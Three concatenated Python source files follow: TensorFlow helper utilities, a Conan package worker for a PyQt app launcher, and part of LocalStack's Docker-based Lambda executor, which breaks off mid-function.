out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
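# A minimal round-trip sketch (illustrative only): GetFlat/SetFromFlat can be paired to snapshot and
# restore a variable list as a single flat vector, e.g.
#     get_flat = GetFlat(var_list); set_from_flat = SetFromFlat(var_list)
#     theta = get_flat()            # 1-D numpy array with sum(numel(v) for v in var_list) entries
#     set_from_flat(theta)          # writes the same values back into the variables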
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(
name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from openai_baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " " * (55 - len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params * 1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from openai_baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from openai_baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
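# A minimal usage sketch (illustrative shapes): with a placeholder of shape [None, 4], passing the
# nested list [[1, 2, 3, 4]] is converted to a numpy array and reshaped via np.reshape(data, [-1, 4]).
# Incompatible data is meant to trip the assertion above, although _check_shape below currently
# returns True unconditionally (see the note there).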
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
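    # NOTE: the early return above disables the compatibility check; the code below is currently unreachable.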
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
conan_worker.py
|
from queue import Queue
from threading import Thread
# this allows to use forward declarations to avoid circular imports
from typing import TYPE_CHECKING, Dict, List, Tuple
from PyQt5 import QtCore
from conans.model.ref import ConanFileReference
from conan_app_launcher.base import Logger
from conan_app_launcher.components.conan import ConanApi
if TYPE_CHECKING:
from conan_app_launcher.components import TabEntry
class ConanWorker():
""" Sequential worker with a queue to execute conan commands and get info on packages """
def __init__(self, tabs: List["TabEntry"], gui_update_signal: QtCore.pyqtSignal):
self._conan = ConanApi()
self._conan_queue: "Queue[Tuple[str, Dict[str, str]]]" = Queue(maxsize=0)
self._version_getter = None
self._worker = None
self._closing = False
self._gui_update_signal = gui_update_signal
self._tabs = tabs
# get all conan refs and make them unique # TODO separate this from worker
conan_refs = []
for tab in tabs:
for app in tab.get_app_entries():
ref_dict = {"name": str(app.conan_ref), "options": app.conan_options}
if not ref_dict in conan_refs:
conan_refs.append(ref_dict)
# fill up queue
for ref in conan_refs:
self._conan_queue.put([ref["name"], ref["options"]])
# start getting versions info in a separate thread
self._version_getter = Thread(target=self._get_packages_versions, args=[ref["name"], ])
self._version_getter.start()
self.start_working()
    def put_ref_in_queue(self, conan_ref: str, conan_options: dict):
self._conan_queue.put([conan_ref, conan_options])
self.start_working()
def start_working(self):
""" Start worker, if it is not already started (can be called multiple times)"""
if not self._worker or not self._worker.is_alive():
self._worker = Thread(target=self._work_on_conan_queue, name="ConanWorker")
self._worker.start()
def finish_working(self, timeout_s: int = None):
""" Cancel, if worker is still not finished """
self._closing = True
if self._worker and self._worker.is_alive():
self._worker.join(timeout_s)
if self._version_getter and self._version_getter.is_alive():
self._version_getter.join(timeout_s)
self._conan_queue = Queue(maxsize=0)
self._worker = None # reset thread for later instantiation
def _work_on_conan_queue(self):
""" Call conan operations from queue """
while not self._closing and not self._conan_queue.empty():
conan_ref, conan_options = self._conan_queue.get()
package_folder = self._conan.get_path_or_install(
ConanFileReference.loads(conan_ref), conan_options)
# call update on every entry which has this ref
for tab in self._tabs:
for app in tab.get_app_entries():
if str(app.conan_ref) == conan_ref:
app.set_package_info(package_folder)
Logger().debug("Finish working on " + conan_ref)
if self._gui_update_signal:
self._gui_update_signal.emit()
self._conan_queue.task_done()
def _get_packages_versions(self, conan_ref):
available_refs = self._conan.search_for_all_recipes(ConanFileReference.loads(conan_ref))
if not available_refs:
return
for tab in self._tabs:
for app in tab.get_app_entries():
if not self._closing and str(app.conan_ref) == conan_ref:
app.set_available_packages(available_refs)
if not self._closing and self._gui_update_signal:
self._gui_update_signal.emit()
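# A minimal usage sketch (illustrative; in the application the worker is created by the GUI layer):
#     worker = ConanWorker(tabs, gui_update_signal)      # queues every unique ref found in `tabs`
#     worker.put_ref_in_queue("zlib/1.2.11@_/_", {})      # enqueue an additional reference
#     worker.finish_working(timeout_s=10)                 # join worker threads on shutdown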
|
lambda_executors.py
|
import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
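# A minimal usage sketch (hypothetical SQS-style event): for
#     event = {'Records': [{'eventSource': 'aws:sqs', 'eventSourceARN': 'arn:aws:sqs:...'}]}
# get_from_event(event, 'eventSource') returns 'aws:sqs', while a missing key or an empty dict
# yields None via the KeyError handler.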
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(bootstrap.MAIN_CONTAINER_NAME, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
env_vars=env_vars, stdin=True)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output))
return result
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
if hasattr(context, 'client_context'):
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(context.client_context)
# custom command to execute in the container
command = ''
events_file = ''
# if running a Java Lambda, set up classpath arguments
if is_java_lambda(runtime):
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file and os.path.exists(events_file) and rm_rf(events_file)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
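    # Roughly, the assembled command has the following shape (illustrative; the copy step is only
    # prepended on the first invocation when LAMBDA_REMOTE_DOCKER is enabled):
    #     docker cp "<lambda_cwd>/." "<container>:/var/task"; docker exec -e VAR="$VAR" ... <container> <entrypoint> <handler>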
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
        :param runtime: Lambda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
